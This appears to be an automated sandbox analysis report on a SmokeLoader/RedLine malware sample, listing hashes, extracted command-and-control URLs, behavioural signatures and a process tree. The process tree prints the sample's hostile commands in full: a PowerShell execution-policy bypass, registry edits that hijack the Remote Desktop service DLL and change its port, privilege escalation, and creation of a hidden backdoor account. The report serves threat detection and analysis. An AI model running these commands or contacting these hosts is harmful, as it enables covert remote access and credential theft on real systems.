Analysis
-
max time kernel
152s -
max time network
144s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10-12-2021 08:59
Static task
static1
Behavioral task
behavioral1
Sample
b03090cd1bd177ae33407bf0660045ed.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
b03090cd1bd177ae33407bf0660045ed.exe
Resource
win10-en-20211208
General
-
Target
b03090cd1bd177ae33407bf0660045ed.exe
-
Size
219KB
-
MD5
b03090cd1bd177ae33407bf0660045ed
-
SHA1
2813830526d47eda025534dcf6956b468b340dcd
-
SHA256
bfb63daf8e5d09c7a464bfec38d2d5e4737bd3d2c04974616ef46b5ffddcc8f1
-
SHA512
b4b107b6edb252369e850c31fb6dd04616236bf3f44298b2e85d09d47f7167d870d625012dfae070f8f10ed6431712aff5c58ff68a0bbcdb2b6a62843e72f037
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2280-122-0x0000000000AA0000-0x0000000000B0C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 92 2836 powershell.exe 94 2836 powershell.exe 95 2836 powershell.exe 96 2836 powershell.exe 98 2836 powershell.exe 100 2836 powershell.exe 102 2836 powershell.exe 104 2836 powershell.exe 106 2836 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
ADA1.exeEFAC.exepid process 2280 ADA1.exe 956 EFAC.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3036 -
Loads dropped DLL 2 IoCs
Processes:
pid process 2488 2488 -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
ADA1.exepid process 2280 ADA1.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8525.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8584.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_njluuffr.vxz.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8594.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_yob25qff.dyk.psm1 powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85A5.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85A6.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
b03090cd1bd177ae33407bf0660045ed.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b03090cd1bd177ae33407bf0660045ed.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b03090cd1bd177ae33407bf0660045ed.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b03090cd1bd177ae33407bf0660045ed.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 96 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 98 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 94 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 95 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
b03090cd1bd177ae33407bf0660045ed.exepid process 2652 b03090cd1bd177ae33407bf0660045ed.exe 2652 b03090cd1bd177ae33407bf0660045ed.exe 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3036 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
b03090cd1bd177ae33407bf0660045ed.exepid process 2652 b03090cd1bd177ae33407bf0660045ed.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeShutdownPrivilege 3036 Token: SeCreatePagefilePrivilege 3036 Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 3188 powershell.exe Token: SeIncreaseQuotaPrivilege 3188 powershell.exe Token: SeSecurityPrivilege 3188 powershell.exe Token: SeTakeOwnershipPrivilege 3188 powershell.exe Token: SeLoadDriverPrivilege 3188 powershell.exe Token: SeSystemProfilePrivilege 3188 powershell.exe Token: SeSystemtimePrivilege 3188 powershell.exe Token: SeProfSingleProcessPrivilege 3188 powershell.exe Token: SeIncBasePriorityPrivilege 3188 powershell.exe Token: SeCreatePagefilePrivilege 3188 powershell.exe Token: SeBackupPrivilege 3188 powershell.exe Token: SeRestorePrivilege 3188 powershell.exe Token: SeShutdownPrivilege 3188 powershell.exe Token: SeDebugPrivilege 3188 powershell.exe Token: SeSystemEnvironmentPrivilege 3188 powershell.exe Token: SeRemoteShutdownPrivilege 3188 powershell.exe Token: SeUndockPrivilege 3188 powershell.exe Token: SeManageVolumePrivilege 3188 powershell.exe Token: 33 3188 powershell.exe Token: 34 3188 powershell.exe Token: 35 3188 powershell.exe Token: 36 3188 powershell.exe Token: SeDebugPrivilege 404 powershell.exe Token: SeIncreaseQuotaPrivilege 404 powershell.exe Token: SeSecurityPrivilege 404 powershell.exe Token: SeTakeOwnershipPrivilege 404 powershell.exe Token: SeLoadDriverPrivilege 404 powershell.exe Token: SeSystemProfilePrivilege 404 powershell.exe Token: SeSystemtimePrivilege 404 powershell.exe Token: SeProfSingleProcessPrivilege 404 powershell.exe Token: SeIncBasePriorityPrivilege 404 powershell.exe Token: SeCreatePagefilePrivilege 404 powershell.exe Token: SeBackupPrivilege 404 powershell.exe Token: SeRestorePrivilege 404 powershell.exe Token: SeShutdownPrivilege 404 powershell.exe Token: SeDebugPrivilege 404 powershell.exe Token: SeSystemEnvironmentPrivilege 404 powershell.exe Token: SeRemoteShutdownPrivilege 404 powershell.exe Token: SeUndockPrivilege 404 powershell.exe Token: SeManageVolumePrivilege 404 powershell.exe Token: 33 404 powershell.exe Token: 34 404 powershell.exe Token: 35 404 powershell.exe Token: 36 404 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeIncreaseQuotaPrivilege 2776 powershell.exe Token: SeSecurityPrivilege 2776 powershell.exe Token: SeTakeOwnershipPrivilege 2776 powershell.exe Token: SeLoadDriverPrivilege 2776 powershell.exe Token: SeSystemProfilePrivilege 2776 powershell.exe Token: SeSystemtimePrivilege 2776 powershell.exe Token: SeProfSingleProcessPrivilege 2776 powershell.exe Token: SeIncBasePriorityPrivilege 2776 powershell.exe Token: SeCreatePagefilePrivilege 2776 powershell.exe Token: SeBackupPrivilege 2776 powershell.exe Token: SeRestorePrivilege 2776 powershell.exe Token: SeShutdownPrivilege 2776 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeSystemEnvironmentPrivilege 2776 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 3036 3036 3036 3036 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 3036 3036 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
EFAC.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3036 wrote to memory of 2280 3036 ADA1.exe PID 3036 wrote to memory of 2280 3036 ADA1.exe PID 3036 wrote to memory of 2280 3036 ADA1.exe PID 3036 wrote to memory of 956 3036 EFAC.exe PID 3036 wrote to memory of 956 3036 EFAC.exe PID 956 wrote to memory of 1456 956 EFAC.exe powershell.exe PID 956 wrote to memory of 1456 956 EFAC.exe powershell.exe PID 1456 wrote to memory of 3404 1456 powershell.exe csc.exe PID 1456 wrote to memory of 3404 1456 powershell.exe csc.exe PID 3404 wrote to memory of 2692 3404 csc.exe cvtres.exe PID 3404 wrote to memory of 2692 3404 csc.exe cvtres.exe PID 1456 wrote to memory of 3456 1456 powershell.exe csc.exe PID 1456 wrote to memory of 3456 1456 powershell.exe csc.exe PID 3456 wrote to memory of 732 3456 csc.exe cvtres.exe PID 3456 wrote to memory of 732 3456 csc.exe cvtres.exe PID 1456 wrote to memory of 3188 1456 powershell.exe powershell.exe PID 1456 wrote to memory of 3188 1456 powershell.exe powershell.exe PID 1456 wrote to memory of 404 1456 powershell.exe powershell.exe PID 1456 wrote to memory of 404 1456 powershell.exe powershell.exe PID 1456 wrote to memory of 2776 1456 powershell.exe powershell.exe PID 1456 wrote to memory of 2776 1456 powershell.exe powershell.exe PID 1456 wrote to memory of 3664 1456 powershell.exe reg.exe PID 1456 wrote to memory of 3664 1456 powershell.exe reg.exe PID 1456 wrote to memory of 1360 1456 powershell.exe reg.exe PID 1456 wrote to memory of 1360 1456 powershell.exe reg.exe PID 1456 wrote to memory of 2164 1456 powershell.exe reg.exe PID 1456 wrote to memory of 2164 1456 powershell.exe reg.exe PID 1456 wrote to memory of 2292 1456 powershell.exe net.exe PID 1456 wrote to memory of 2292 1456 powershell.exe net.exe PID 2292 wrote to memory of 3228 2292 net.exe net1.exe PID 2292 wrote to memory of 3228 2292 net.exe net1.exe PID 1456 wrote to memory of 3352 1456 powershell.exe cmd.exe PID 1456 wrote to memory of 3352 1456 powershell.exe cmd.exe PID 3352 wrote to memory of 3960 3352 cmd.exe cmd.exe PID 3352 wrote to memory of 3960 3352 cmd.exe cmd.exe PID 3960 wrote to memory of 680 3960 cmd.exe net.exe PID 3960 wrote to memory of 680 3960 cmd.exe net.exe PID 680 wrote to memory of 2948 680 net.exe net1.exe PID 680 wrote to memory of 2948 680 net.exe net1.exe PID 1456 wrote to memory of 2432 1456 powershell.exe cmd.exe PID 1456 wrote to memory of 2432 1456 powershell.exe cmd.exe PID 2432 wrote to memory of 3300 2432 cmd.exe cmd.exe PID 2432 wrote to memory of 3300 2432 cmd.exe cmd.exe PID 3300 wrote to memory of 3056 3300 cmd.exe net.exe PID 3300 wrote to memory of 3056 3300 cmd.exe net.exe PID 3056 wrote to memory of 1584 3056 net.exe net1.exe PID 3056 wrote to memory of 1584 3056 net.exe net1.exe PID 3192 wrote to memory of 2840 3192 cmd.exe net.exe PID 3192 wrote to memory of 2840 3192 cmd.exe net.exe PID 2840 wrote to memory of 2652 2840 net.exe net1.exe PID 2840 wrote to memory of 2652 2840 net.exe net1.exe PID 1460 wrote to memory of 3004 1460 cmd.exe net.exe PID 1460 wrote to memory of 3004 1460 cmd.exe net.exe PID 3004 wrote to memory of 732 3004 net.exe net1.exe PID 3004 wrote to memory of 732 3004 net.exe net1.exe PID 3156 wrote to memory of 648 3156 cmd.exe net.exe PID 3156 wrote to memory of 648 3156 cmd.exe net.exe PID 648 wrote to memory of 856 648 net.exe net1.exe PID 648 wrote to memory of 856 648 net.exe net1.exe PID 3900 wrote to memory of 1216 3900 cmd.exe net.exe PID 3900 wrote to memory of 1216 3900 cmd.exe net.exe PID 1216 wrote to memory of 2828 1216 net.exe net1.exe PID 1216 wrote to memory of 2828 1216 net.exe net1.exe PID 304 wrote to memory of 3832 304 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b03090cd1bd177ae33407bf0660045ed.exe"C:\Users\Admin\AppData\Local\Temp\b03090cd1bd177ae33407bf0660045ed.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\ADA1.exeC:\Users\Admin\AppData\Local\Temp\ADA1.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\EFAC.exeC:\Users\Admin\AppData\Local\Temp\EFAC.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2o05jx1i\2o05jx1i.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18EE.tmp" "c:\Users\Admin\AppData\Local\Temp\2o05jx1i\CSC4A6977B1B5D4D7CBDA0A64D0F7DFBD.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ni0oup1h\ni0oup1h.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES212B.tmp" "c:\Users\Admin\AppData\Local\Temp\ni0oup1h\CSC1261582FA4C645DB821DCB8B67D11D2F.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc aKxqZVVk /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc aKxqZVVk /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc aKxqZVVk /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
